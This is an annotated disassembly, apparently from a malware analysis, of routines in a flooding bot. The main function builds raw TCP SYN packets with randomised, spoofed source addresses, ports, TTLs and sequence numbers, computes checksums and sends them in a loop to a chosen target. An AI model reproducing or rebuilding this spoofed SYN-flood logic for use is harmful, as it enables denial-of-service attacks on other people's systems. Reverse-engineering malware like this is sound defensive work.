 8049cd0:   75 4b                   jne    0x8049d1d
 Send the packet twice
 8049cd2:   6a 10                   push   $0x10
 8049cd4:   8b 8d 60 ff ff ff       mov    0xffffff60(%ebp),%ecx
 8049cda:   51                      push   %ecx
 8049cdb:   6a 00                   push   $0x0
 8049cdd:   8b 8d 64 ff ff ff       mov    0xffffff64(%ebp),%ecx
 8049ce3:   51                      push   %ecx
 8049ce4:   57                      push   %edi
 8049ce5:   8b 8d 68 ff ff ff       mov    socket(%ebp),%ecx
 8049ceb:   51                      push   %ecx
 8049cec:   e8 4b cf 00 00          call   sendto
 
 8049cf1:   6a 10                   push   $0x10
 8049cf3:   8b 8d 60 ff ff ff       mov    0xffffff60(%ebp),%ecx
 8049cf9:   51                      push   %ecx
 8049cfa:   6a 00                   push   $0x0
 8049cfc:   8b 8d 64 ff ff ff       mov    0xffffff64(%ebp),%ecx
 8049d02:   51                      push   %ecx
 8049d03:   57                      push   %edi
 8049d04:   8b 8d 68 ff ff ff       mov    socket(%ebp),%ecx
 8049d0a:   51                      push   %ecx
 8049d0b:   e8 2c cf 00 00          call   sendto

 8049d10:   83 c4 30                add    $0x30,%esp
 8049d13:   6a 14                   push   $0x14
 8049d15:   e8 96 b8 00 00          call   feof
 8049d1a:   83 c4 04                add    $0x4,%esp
 8049d1d:   4b                      dec    %ebx
end of while(1)
 8049d1e:   e9 55 ff ff ff          jmp    0x8049c78
 8049d23:   90                      nop    

pid=0; return 0;
 8049d24:   c7 05 74 e7 07 08 00    movl   $0x0,pid
 8049d2b:   00 00 00 
 8049d2e:   31 c0                   xor    %eax,%eax
 8049d30:   8d a5 54 ff ff ff       lea    0xffffff54(%ebp),%esp
 8049d36:   5b                      pop    %ebx
 8049d37:   5e                      pop    %esi
 8049d38:   5f                      pop    %edi
 8049d39:   89 ec                   mov    %ebp,%esp
 8049d3b:   5d                      pop    %ebp
 8049d3c:   c3                      ret    
 8049d3d:   8d 76 00                lea    0x0(%esi),%esi

Function 10-11,

/*
0x8 0xc 0x10 0x14 IP dst
0x18 0x1c TCP port dst
0x20 !=0 use IP src
0x24 0x28 0x2c 0x30 IP src
0x34 cpt
0x38 !=0 use name dst
0x3c name dst
/*

 8049d40:   55                      push   %ebp
 8049d41:   89 e5                   mov    %esp,%ebp
 8049d43:   81 ec cc 00 00 00       sub    $0xcc,%esp
 8049d49:   57                      push   %edi
 8049d4a:   56                      push   %esi
 8049d4b:   53                      push   %ebx
 Copy IP dst argument
 8049d4c:   8a 5d 08                mov    0x8(%ebp),%bl
 8049d4f:   88 9d 5c ff ff ff       mov    %bl,0xffffff5c(%ebp)
 8049d55:   8a 5d 0c                mov    0xc(%ebp),%bl
 8049d58:   88 9d 58 ff ff ff       mov    %bl,0xffffff58(%ebp)
 8049d5e:   8a 5d 10                mov    0x10(%ebp),%bl
 8049d61:   88 9d 54 ff ff ff       mov    %bl,0xffffff54(%ebp)
 8049d67:   8a 5d 14                mov    0x14(%ebp),%bl
 8049d6a:   88 9d 38 ff ff ff       mov    %bl,0xffffff38(%ebp)
 
 Copy IP src argument
 8049d70:   8a 5d 24                mov    0x24(%ebp),%bl
 8049d73:   88 9d 50 ff ff ff       mov    %bl,0xffffff50(%ebp)
 8049d79:   8a 5d 28                mov    0x28(%ebp),%bl
 8049d7c:   88 9d 4c ff ff ff       mov    %bl,0xffffff4c(%ebp)
 8049d82:   8a 5d 2c                mov    0x2c(%ebp),%bl
 8049d85:   88 9d 48 ff ff ff       mov    %bl,0xffffff48(%ebp)
 8049d8b:   8a 5d 30                mov    0x30(%ebp),%bl
 8049d8e:   88 9d 44 ff ff ff       mov    %bl,0xffffff44(%ebp)

 8049d94:   83 7d 34 00             cmpl   $0x0,0x34(%ebp)
 8049d98:   74 03                   je     0x8049d9d
 8049d9a:   ff 4d 34                decl   0x34(%ebp)

 8049d9d:   6a 00                   push   $0x0
 8049d9f:   e8 a0 d6 00 00          call   time
 8049da4:   83 c4 04                add    $0x4,%esp
 8049da7:   50                      push   %eax
 8049da8:   e8 f3 bb 00 00          call   srandom
 8049dad:   83 c4 04                add    $0x4,%esp

 init data
 8049db0:   66 c7 45 f0 02 00       movw   $0x2,0xfffffff0(%ebp) // AF_INET

 random IP dst
 8049db6:   e8 7d c0 00 00          call   random
 8049dbb:   bb ff 00 00 00          mov    $0xff,%ebx
 8049dc0:   99                      cltd   
 8049dc1:   f7 fb                   idiv   %ebx,%eax
 8049dc3:   89 d0                   mov    %edx,%eax
 8049dc5:   86 c4                   xchg   %al,%ah
 8049dc7:   66 89 45 f2             mov    %ax,0xfffffff2(%ebp)

 set IP dst if no name is specified
 8049dcb:   83 7d 38 00             cmpl   $0x0,0x38(%ebp)
 8049dcf:   75 3a                   jne    0x8049e0b
 8049dd1:   0f b6 85 38 ff ff ff    movzbl 0xffffff38(%ebp),%eax
 8049dd8:   50                      push   %eax
 8049dd9:   0f b6 85 54 ff ff ff    movzbl 0xffffff54(%ebp),%eax
 8049de0:   50                      push   %eax
 8049de1:   0f b6 85 58 ff ff ff    movzbl 0xffffff58(%ebp),%eax
 8049de8:   50                      push   %eax
 8049de9:   0f b6 85 5c ff ff ff    movzbl 0xffffff5c(%ebp),%eax
 8049df0:   50                      push   %eax
 8049df1:   68 8a 76 06 08          push   $format_ip
 8049df6:   8d 5d 88                lea    0xffffff88(%ebp),%ebx
 8049df9:   53                      push   %ebx
 8049dfa:   e8 09 5a 00 00          call   sprintf
 8049dff:   53                      push   %ebx
 8049e00:   e8 87 30 00 00          call   inet_addr
 8049e05:   89 45 f4                mov    %eax,0xfffffff4(%ebp)
 8049e08:   83 c4 1c                add    $0x1c,%esp
 
IPv4, ip header=20 bytes
 8049e0b:   c6 45 c8 45             movb   $0x45,0xffffffc8(%ebp)
set IP length
 8049e0f:   66 c7 45 ca 00 28       movw   $0x2800,0xffffffca(%ebp)
IP ecn=0, dscp=0
 8049e15:   c6 45 c9 00             movb   $0x0,0xffffffc9(%ebp)

 get a RAW socket
 8049e19:   68 ff 00 00 00          push   $0xff
 8049e1e:   6a 03                   push   $0x3 SOCK_RAW
 8049e20:   6a 02                   push   $0x2 INET
 8049e22:   e8 cd ce 00 00          call   socket
 8049e27:   89 85 40 ff ff ff       mov    %eax,0xffffff40(%ebp)    // socket
 8049e2d:   83 c4 0c                add    $0xc,%esp
 8049e30:   85 c0                   test   %eax,%eax
 8049e32:   0f 8e 40 03 00 00       jle    0x804a178

  set IP src if any
 8049e38:   83 7d 20 00             cmpl   $0x0,0x20(%ebp)
 8049e3c:   74 34                   je     0x8049e72
 8049e3e:   0f b6 85 44 ff ff ff    movzbl 0xffffff44(%ebp),%eax
 8049e45:   50                      push   %eax
 8049e46:   0f b6 85 48 ff ff ff    movzbl 0xffffff48(%ebp),%eax
 8049e4d:   50                      push   %eax
 8049e4e:   0f b6 85 4c ff ff ff    movzbl 0xffffff4c(%ebp),%eax
 8049e55:   50                      push   %eax
 8049e56:   0f b6 85 50 ff ff ff    movzbl 0xffffff50(%ebp),%eax
 8049e5d:   50                      push   %eax
 8049e5e:   68 8a 76 06 08          push   $format_ip
 8049e63:   8d 85 68 ff ff ff       lea    0xffffff68(%ebp),%eax
 8049e69:   50                      push   %eax
 8049e6a:   e8 99 59 00 00          call   sprintf
 8049e6f:   83 c4 18                add    $0x18,%esp

 set IP dst if no name is specified
 8049e72:   83 7d 38 00             cmpl   $0x0,0x38(%ebp)
 8049e76:   75 0f                   jne    0x8049e87
 8049e78:   8d 45 88                lea    0xffffff88(%ebp),%eax
 8049e7b:   50                      push   %eax
 8049e7c:   e8 0b 30 00 00          call   inet_addr
 8049e81:   89 45 d8                mov    %eax,0xffffffd8(%ebp)
 8049e84:   83 c4 04                add    $0x4,%esp

 frag=0
 8049e87:   66 c7 45 ce 00 00       movw   $0x0,0xffffffce(%ebp)
IP proto=0x6=TCP
 8049e8d:   c6 45 d1 06             movb   $0x6,0xffffffd1(%ebp)

 TCP flags mask (foro nothing, see next)
 8049e91:   8a 45 e9                mov    0xffffffe9(%ebp),%al
 8049e94:   24 ef                   and    $0xef,%al
 8049e96:   88 45 e9                mov    %al,0xffffffe9(%ebp)
 
 TCP hdr len
 8049e99:   8a 45 e8                mov    0xffffffe8(%ebp),%al
 8049e9c:   24 0f                   and    $0xf,%al
 8049e9e:   0c 50                   or     $0x50,%al
 8049ea0:   88 45 e8                mov    %al,0xffffffe8(%ebp)
 8049ea3:   c7 45 e4 00 00 00 00    movl   $0x0,0xffffffe4(%ebp)
 8049eaa:   24 50                   and    $0x50,%al
 8049eac:   88 45 e8                mov    %al,0xffffffe8(%ebp)
 
 TCP flags=SYN
 8049eaf:   c6 45 e9 02             movb   $0x2,0xffffffe9(%ebp)
 TCP crc=0
 8049eb3:   66 c7 45 ee 00 00       movw   $0x0,0xffffffee(%ebp)
 TCP port dst
 8049eb9:   8b 45 18                mov    0x18(%ebp),%eax
 8049ebc:   c1 e0 08                shl    $0x8,%eax
 8049ebf:   66 03 45 1c             add    0x1c(%ebp),%ax
 8049ec3:   86 c4                   xchg   %al,%ah
 8049ec5:   66 89 45 de             mov    %ax,0xffffffde(%ebp)

 8049ec9:   31 ff                   xor    %edi,%edi
 8049ecb:   c6 45 b0 00             movb   $0x0,0xffffffb0(%ebp)
 8049ecf:   83 7d 38 00             cmpl   $0x0,0x38(%ebp)
 8049ed3:   75 06                   jne    0x8049edb
 8049ed5:   8b 45 d8                mov    0xffffffd8(%ebp),%eax
 8049ed8:   89 45 ac                mov    %eax,0xffffffac(%ebp)
 8049edb:   c6 45 b1 06             movb   $0x6,0xffffffb1(%ebp)
 8049edf:   66 c7 45 b2 00 14       movw   $0x1400,0xffffffb2(%ebp)
 8049ee5:   31 f6                   xor    %esi,%esi
 8049ee7:   8d 5d a8                lea    0xffffffa8(%ebp),%ebx
 8049eea:   89 9d 3c ff ff ff       mov    %ebx,0xffffff3c(%ebp)

 use name ?
 8049ef0:   c7 85 34 ff ff ff 00    movl   $0x0,0xffffff34(%ebp)
 8049ef7:   00 00 00 
 8049efa:   83 7d 38 00             cmpl   $0x0,0x38(%ebp)
 8049efe:   74 5b                   je     0x8049f5b
 yes
 8049f00:   85 f6                   test   %esi,%esi
 8049f02:   7f 57                   jg     0x8049f5b
 8049f04:   8b 5d 3c                mov    0x3c(%ebp),%ebx
 8049f07:   53                      push   %ebx
 8049f08:   e8 73 20 00 00          call   get_host_by_name
 8049f0d:   89 c2                   mov    %eax,%edx
 8049f0f:   83 c4 04                add    $0x4,%esp
 8049f12:   85 d2                   test   %edx,%edx
 8049f14:   75 1a                   jne    0x8049f30
 8049f16:   68 58 02 00 00          push   $0x258
 8049f1b:   e8 ac b7 00 00          call   seterrno_cx
 8049f20:   c7 85 34 ff ff ff 01    movl   $0x1,0xffffff34(%ebp)
 8049f27:   00 00 00 
 8049f2a:   83 c4 04                add    $0x4,%esp
 8049f2d:   eb 2c                   jmp    0x8049f5b
 8049f2f:   90                      nop    

 8049f30:   6a 04                   push   $0x4
 8049f32:   8d 85 64 ff ff ff       lea    0xffffff64(%ebp),%eax
 8049f38:   50                      push   %eax
 8049f39:   8b 42 10                mov    0x10(%edx),%eax
 8049f3c:   8b 00                   mov    (%eax),%eax
 8049f3e:   50                      push   %eax
 8049f3f:   e8 3c c5 00 00          call   bcopy
 8049f44:   8b 85 64 ff ff ff       mov    0xffffff64(%ebp),%eax
 8049f4a:   89 45 d8                mov    %eax,0xffffffd8(%ebp)
 8049f4d:   89 45 f4                mov    %eax,0xfffffff4(%ebp)
 8049f50:   89 45 ac                mov    %eax,0xffffffac(%ebp)
 8049f53:   be 40 9c 00 00          mov    $0x9c40,%esi
 8049f58:   83 c4 0c                add    $0xc,%esp

 if DNS resolution failed, use random IP dst
 8049f5b:   83 bd 34 ff ff ff 00    cmpl   $0x0,0xffffff34(%ebp)
 8049f62:   75 8c                   jne    0x8049ef0
 8049f64:   e8 ef c0 00 00          call   call_random
 8049f69:   bb 11 0c 00 00          mov    $0xc11,%ebx
 8049f6e:   99                      cltd   
 8049f6f:   f7 fb                   idiv   %ebx,%eax
 8049f71:   89 d0                   mov    %edx,%eax
 8049f73:   80 c4 02                add    $0x2,%ah
 8049f76:   86 c4                   xchg   %al,%ah
 8049f78:   66 89 45 cc             mov    %ax,0xffffffcc(%ebp)

 TCP window size
 8049f7c:   e8 d7 c0 00 00          call   call_random
 8049f81:   bb 79 05 00 00          mov    $0x579,%ebx
 8049f86:   99                      cltd   
 8049f87:   f7 fb                   idiv   %ebx,%eax
 8049f89:   89 d0                   mov    %edx,%eax
 8049f8b:   66 05 c8 00             add    $0xc8,%ax
 8049f8f:   86 c4                   xchg   %al,%ah
 8049f91:   66 89 45 ea             mov    %ax,0xffffffea(%ebp)

 TCP src port 
 8049f95:   e8 be c0 00 00          call   call_random
 8049f9a:   bb 40 9c 00 00          mov    $0x9c40,%ebx
 8049f9f:   99                      cltd   
 8049fa0:   f7 fb                   idiv   %ebx,%eax
 8049fa2:   89 d0                   mov    %edx,%eax
 8049fa4:   66 40                   inc    %ax
 8049fa6:   86 c4                   xchg   %al,%ah
 8049fa8:   66 89 45 dc             mov    %ax,0xffffffdc(%ebp)

 TCP seq nbr
 8049fac:   e8 a7 c0 00 00          call   call_random
 8049fb1:   bb 00 5a 62 02          mov    $0x2625a00,%ebx
 8049fb6:   99                      cltd   
 8049fb7:   f7 fb                   idiv   %ebx,%eax
 8049fb9:   8d 42 01                lea    0x1(%edx),%eax
 8049fbc:   86 c4                   xchg   %al,%ah
 8049fbe:   c1 c8 10                ror    $0x10,%eax
 8049fc1:   86 c4                   xchg   %al,%ah
 8049fc3:   89 45 e0                mov    %eax,0xffffffe0(%ebp)

 IP TTL
 8049fc6:   e8 8d c0 00 00          call   call_random
 8049fcb:   bb 74 00 00 00          mov    $0x74,%ebx
 8049fd0:   99                      cltd   
 8049fd1:   f7 fb                   idiv   %ebx,%eax
 8049fd3:   80 c2 7d                add    $0x7d,%dl
 8049fd6:   88 55 d0                mov    %dl,0xffffffd0(%ebp)

 8049fd9:   83 7d 20 00             cmpl   $0x0,0x20(%ebp)
 8049fdd:   75 3d                   jne    0x804a01c

 random IP src
 8049fdf:   e8 54 be 00 00          call   random
 8049fe4:   bb ff 00 00 00          mov    $0xff,%ebx
 8049fe9:   99                      cltd   
 8049fea:   f7 fb                   idiv   %ebx,%eax
 8049fec:   52                      push   %edx
 8049fed:   e8 46 be 00 00          call   random
 8049ff2:   99                      cltd   
 8049ff3:   f7 fb                   idiv   %ebx,%eax
 8049ff5:   52                      push   %edx
 8049ff6:   e8 3d be 00 00          call   random
 8049ffb:   99                      cltd   
 8049ffc:   f7 fb                   idiv   %ebx,%eax
 8049ffe:   52                      push   %edx
 8049fff:   e8 34 be 00 00          call   random
 804a004:   99                      cltd   
 804a005:   f7 fb                   idiv   %ebx,%eax
 804a007:   52                      push   %edx
 804a008:   68 b0 78 06 08          push   $0x80678b0 // %u.%u.%u.%u
 804a00d:   8d 85 68 ff ff ff       lea    0xffffff68(%ebp),%eax
 804a013:   50                      push   %eax
 804a014:   e8 ef 57 00 00          call   sprintf
 804a019:   83 c4 18                add    $0x18,%esp

 set IP src
 804a01c:   8d 85 68 ff ff ff       lea    0xffffff68(%ebp),%eax
 804a022:   50                      push   %eax
 804a023:   e8 64 2e 00 00          call   inet_addr
 804a028:   89 45 d4                mov    %eax,0xffffffd4(%ebp)
 804a02b:   89 45 a8                mov    %eax,0xffffffa8(%ebp)

 TCP crc=0
 804a02e:   66 c7 45 ec 00 00       movw   $0x0,0xffffffec(%ebp)
 IP crc=0
 804a034:   66 c7 45 d2 00 00       movw   $0x0,0xffffffd2(%ebp)
 copy beginning of TCP header
 804a03a:   6a 14                   push   $0x14
 804a03c:   8d 45 b4                lea    0xffffffb4(%ebp),%eax
 804a03f:   50                      push   %eax
 804a040:   8d 45 dc                lea    0xffffffdc(%ebp),%eax // TCP
 804a043:   50                      push   %eax
 804a044:   e8 37 c4 00 00          call   bcopy
 804a049:   83 c4 10                add    $0x10,%esp
 calculate TCP crc
 804a04c:   ba 20 00 00 00          mov    $0x20,%edx
 804a051:   8b 9d 3c ff ff ff       mov    0xffffff3c(%ebp),%ebx
 804a057:   89 9d 34 ff ff ff       mov    %ebx,0xffffff34(%ebp)
 804a05d:   31 c9                   xor    %ecx,%ecx
 804a05f:   66 c7 85 62 ff ff ff    movw   $0x0,0xffffff62(%ebp)
 804a066:   00 00 
 804a068:   8b 9d 34 ff ff ff       mov    0xffffff34(%ebp),%ebx
 804a06e:   0f b7 03                movzwl (%ebx),%eax
 804a071:   01 c1                   add    %eax,%ecx
 804a073:   83 c3 02                add    $0x2,%ebx
 804a076:   89 9d 34 ff ff ff       mov    %ebx,0xffffff34(%ebp)
 804a07c:   83 c2 fe                add    $0xfffffffe,%edx
 804a07f:   83 fa 01                cmp    $0x1,%edx
 804a082:   7f e4                   jg     0x804a068
 804a084:   75 11                   jne    0x804a097
 804a086:   8a 03                   mov    (%ebx),%al
 804a088:   88 85 62 ff ff ff       mov    %al,0xffffff62(%ebp)
 804a08e:   0f b7 85 62 ff ff ff    movzwl 0xffffff62(%ebp),%eax
 804a095:   01 c1                   add    %eax,%ecx
 804a097:   89 ca                   mov    %ecx,%edx
 804a099:   c1 fa 10                sar    $0x10,%edx
 804a09c:   0f b7 c1                movzwl %cx,%eax
 804a09f:   8d 0c 10                lea    (%eax,%edx,1),%ecx
 804a0a2:   89 c8                   mov    %ecx,%eax
 804a0a4:   c1 f8 10                sar    $0x10,%eax
 804a0a7:   01 c1                   add    %eax,%ecx
 804a0a9:   89 c8                   mov    %ecx,%eax
 804a0ab:   66 f7 d0                not    %ax
 804a0ae:   66 89 85 62 ff ff ff    mov    %ax,0xffffff62(%ebp)
 804a0b5:   66 89 45 ec             mov    %ax,0xffffffec(%ebp)
 calculate IP checksum
 804a0b9:   ba 14 00 00 00          mov    $0x14,%edx
 804a0be:   8d 5d c8                lea    0xffffffc8(%ebp),%ebx
 804a0c1:   89 9d 34 ff ff ff       mov    %ebx,0xffffff34(%ebp)
 804a0c7:   31 c9                   xor    %ecx,%ecx
 804a0c9:   66 c7 85 62 ff ff ff    movw   $0x0,0xffffff62(%ebp)
 804a0d0:   00 00 
 804a0d2:   8d 36                   lea    (%esi),%esi
 804a0d4:   8b 9d 34 ff ff ff       mov    0xffffff34(%ebp),%ebx
 804a0da:   0f b7 03                movzwl (%ebx),%eax
 804a0dd:   01 c1                   add    %eax,%ecx
 804a0df:   83 c3 02                add    $0x2,%ebx
 804a0e2:   89 9d 34 ff ff ff       mov    %ebx,0xffffff34(%ebp)
 804a0e8:   83 c2 fe                add    $0xfffffffe,%edx
 804a0eb:   83 fa 01                cmp    $0x1,%edx
 804a0ee:   7f e4                   jg     0x804a0d4
 804a0f0:   75 11                   jne    0x804a103
 804a0f2:   8a 03                   mov    (%ebx),%al
 804a0f4:   88 85 62 ff ff ff       mov    %al,0xffffff62(%ebp)
 804a0fa:   0f b7 85 62 ff ff ff    movzwl 0xffffff62(%ebp),%eax
 804a101:   01 c1                   add    %eax,%ecx
 804a103:   89 ca                   mov    %ecx,%edx
 804a105:   c1 fa 10                sar    $0x10,%edx
 804a108:   0f b7 c1                movzwl %cx,%eax
 804a10b:   8d 0c 10                lea    (%eax,%edx,1),%ecx
 804a10e:   89 c8                   mov    %ecx,%eax
 804a110:   c1 f8 10                sar    $0x10,%eax
 804a113:   01 c1                   add    %eax,%ecx
 804a115:   89 c8                   mov    %ecx,%eax
 804a117:   66 f7 d0                not    %ax
 804a11a:   66 89 85 62 ff ff ff    mov    %ax,0xffffff62(%ebp)
 804a121:   66 89 45 d2             mov    %ax,0xffffffd2(%ebp)

 804a125:   6a 10                   push   $0x10
 804a127:   8d 45 f0                lea    0xfffffff0(%ebp),%eax
 804a12a:   50                      push   %eax
 804a12b:   6a 00                   push   $0x0
 804a12d:   6a 28                   push   $0x28
 804a12f:   8d 45 c8                lea    0xffffffc8(%ebp),%eax
 804a132:   50                      push   %eax
 804a133:   8b 9d 40 ff ff ff       mov    0xffffff40(%ebp),%ebx
 804a139:   53                      push   %ebx
 804a13a:   e8 fd ca 00 00          call   sendto
 804a13f:   83 c4 18                add    $0x18,%esp
 804a142:   83 7d 34 00             cmpl   $0x0,0x34(%ebp)
 804a146:   75 0c                   jne    0x804a154
 804a148:   68 2c 01 00 00          push   $0x12c
 804a14d:   e8 5e b4 00 00          call   feof
 804a152:   eb 11                   jmp    0x804a165
 804a154:   39 7d 34                cmp    %edi,0x34(%ebp)
 804a157:   75 17                   jne    0x804a170
 804a159:   68 2c 01 00 00          push   $0x12c
 804a15e:   e8 4d b4 00 00          call   feof
 804a163:   31 ff                   xor    %edi,%edi
 804a165:   4e                      dec    %esi
 804a166:   83 c4 04                add    $0x4,%esp
 804a169:   e9 82 fd ff ff          jmp    0x8049ef0
 804a16e:   8d 36                   lea    (%esi),%esi
 804a170:   47                      inc    %edi
 804a171:   e9 7a fd ff ff          jmp    0x8049ef0
 804a176:   8d 36                   lea    (%esi),%esi
 pid=0; return 0;
 804a178:   c7 05 74 e7 07 08 00    movl   $0x0,pid
 804a17f:   00 00 00 
 804a182:   31 c0                   xor    %eax,%eax
 804a184:   8d a5 28 ff ff ff       lea    0xffffff28(%ebp),%esp
 804a18a:   5b                      pop    %ebx
 804a18b:   5e                      pop    %esi
 804a18c:   5f                      pop    %edi
 804a18d:   89 ec                   mov    %ebp,%esp
 804a18f:   5d                      pop    %ebp
 804a190:   c3                      ret    
 804a191:   8d 76 00                lea    0x0(%esi),%esi